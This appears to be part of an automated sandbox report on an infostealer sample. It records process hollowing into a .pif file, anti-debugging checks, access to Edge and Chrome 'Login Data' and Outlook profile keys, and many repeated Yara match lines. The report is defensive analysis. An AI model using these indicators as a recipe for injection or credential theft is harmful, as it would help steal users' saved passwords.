          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_1_0040CE09
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_1_0040E61C
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_1_00416F6A
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 7_1_004123F1 SetUnhandledExceptionFilter,7_1_004123F1
          Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeMemory allocated: C:\Users\user\Links\dajivhqI.pif base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeSection unmapped: C:\Users\user\Links\dajivhqI.pif base address: 400000Jump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeMemory written: C:\Users\user\Links\dajivhqI.pif base: 361008Jump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeProcess created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pifJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C54BC
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: GetLocaleInfoA,0_2_029CA0B8
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: GetLocaleInfoA,0_2_029CA104
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C55C8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: GetLocaleInfoA,7_2_00417A20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: GetLocaleInfoA,7_1_00417A20
          Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C8B38 GetLocalTime,0_2_029C8B38
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029D9F00 GetUserNameA,0_2_029D9F00
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029CB038 GetVersionExA,0_2_029CB038
          Source: C:\Users\user\Links\dajivhqI.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR
          Source: C:\Users\user\Links\dajivhqI.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Links\dajivhqI.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
